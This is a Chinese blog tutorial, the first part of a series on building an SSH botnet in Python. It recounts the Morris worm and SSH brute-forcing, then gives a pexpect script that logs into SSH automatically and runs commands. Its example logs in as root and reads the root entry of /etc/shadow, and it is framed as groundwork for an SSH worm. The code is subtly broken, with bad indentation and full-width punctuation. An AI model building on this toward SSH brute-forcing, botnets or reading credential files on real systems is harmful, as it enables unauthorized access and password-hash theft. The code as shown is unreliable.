【Python脚本进阶】2.2、构建一个SSH僵尸网络（上）：SSH交互脚本

最新推荐文章于 2023-05-19 23:12:28 发布

黑色地带（崛起）

最新推荐文章于 2023-05-19 23:12:28 发布

阅读量689

点赞数 3

分类专栏：【Py】Python脚本文章标签： ssh python web安全

本文链接：https://blog.csdn.net/qq_53079406/article/details/126033234

版权

【Py】Python脚本专栏收录该内容

22 篇文章 17 订阅

订阅专栏

一、简介

概述：

第一步：创建一个用来搜寻目标的端口扫描程序

现在来到第二步了

第二步：开始利用这些服务中的漏洞

漏洞利用方式

Morris蠕虫有三种攻击方式，其中之一就是用常见的用户名和密码尝试登录RSH服务(remote shell)。RSH是1988年问世，它为系统管理员提供远程连接一台机器，并能在主机上运行一系列终端命令对它进行管理的方法

后来在RSH中增加一个公钥加密算法，以保护其经过网络传递的数据，这就是SSHC Secure Shell) 协议，最终SSH 取代了RSH。不过，对千防范用常见用户名和密码尝试暴力登录的攻击方法，这并不能起到多大的作用。SSH 蠕虫已经被证明是非常成功的和常见的攻击方式

远程IP 地址正试图暴力生成可能的密码后， IDS 阻断该IP 继续尝试登录SSH 的企图

二、用Pexpect与SSH交互

简介：

实现我们自己的能暴力破解特定目标用户名／密码的SSH 蠕虫。因为SSH客户端需要用户与之进行交互，我们的脚本必须在发送进一步的输入命令之前等待并“ 理解＂屏幕输出的意义

考虑以下情形：连接架在IP 地址127.0.0.1上SSH 的机器，应用程序首先会要求我们确认RSA 密钥指纹。必须回答“ 是＂，然后才能继续。在给我们一个命令提示符之前，应用程序要求我们输入密码。最后，还要执行uname-v 命令来确定目标机器上系统内核的版本

如果是拒绝连接的话，可能是ssh没启动

输入

sudo /etc/init.d/ssh start

环境：

为了能自动完成上述控制台交互过程，需要使用一个第三方Python 模块一PexpectPexpect version 4.8 — Pexpect 4.8 documentationhttps://pexpect.readthedocs.io/en/latest/Pexpect 能够实现与程序交互、等待预期的屏幕输出，并据此做出不同的响应。这使得它成为自动暴力破解SSH 用户口令程序的首选工具。

函数：

prompt 是提示的意思. 在 Python 语言中，是一个用户自定义的字符串变量名，目的和作用就是把变量 prompt 的内容作为提示信息

pexpect. spawn收集交互期间生成的返回值

三、实现

第一步：

检测connect(）函数。该函数接收的参数包括一个用户名、主机名和密码，返回的是以此进行的SSH 连接的结果。

利用pexpect 库，程序等待一个“可以预计到的“ 输出。可能会出现三种可能的输出：超时、表示主机已使用一个新的公钥的消息和要求输入密码的提示。如果出现超时，那么session.expect()返回0。用if 语句会识别出这一情况，打印一个错误消息后返回。如果child.expect()方法捕获了ssh_newkey 消息，它会返回一个1，这会使函数发送一个“ yes" 消息，以接收新的密钥。之后，函数等待密码提示，然后发送SSH 密码
import pexpect
PROMPT = ['#', '>>>', '>', '\$']
def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print(child.before)


def connect(user, host, password):
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    child = pexpect.spawn(connStr）
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey,'[P|p]assword：'])
    if ret == 0:
        print('[-] Error Connecting')
        return
    if ret == 1:
    child.sendline('yes')
    ret = child.expect([pexpect.TIMEOUT, '[P|p] assword:'])
        if ret == 0:
            print('[-] Error Connecting')
            return
        child.sendline( password )
        child.expect( PROMPT )
        return child

第二步：

通过验证，就可以使用一个单独的command()函数在SSH 会话中发送命令。command(）函数需要接收的参数是一个SSH 会话和命令字符串。然后，它向会话发送命令字符串，并等待命令提示符再次出现。在获得命令提示符后，该函数把从SSH 会话那里得到的结果打印出来
import pexpect
PROMPT = ['#', '>>>', '>', '\$']
def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print(child.before)

整合：

完整的模拟人交互行为的连接和控制SSH 会话的脚本

import pexpect
PROMPT = ['#', '>>>', '>', '\$']
def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print(child.before)


def connect(user, host, password):
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    child = pexpect.spawn(connStr）
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey,'[P|p]assword：'])
    if ret == 0:
        print('[-] Error Connecting')
        return
    if ret == 1:
    child.sendline('yes')
    ret = child.expect([pexpect.TIMEOUT, '[P|p] assword:'])
        if ret == 0:
            print('[-] Error Connecting')
            return
        child.sendline( password )
        child.expect( PROMPT )
        return child


def main():
    host ='localhost'
    user ='root'
    password ='toor'
    child = connect(user, host, password)
    send_command(child, 'cat /etc/shadow | grep root')


if __name__ == '__main__':
    main()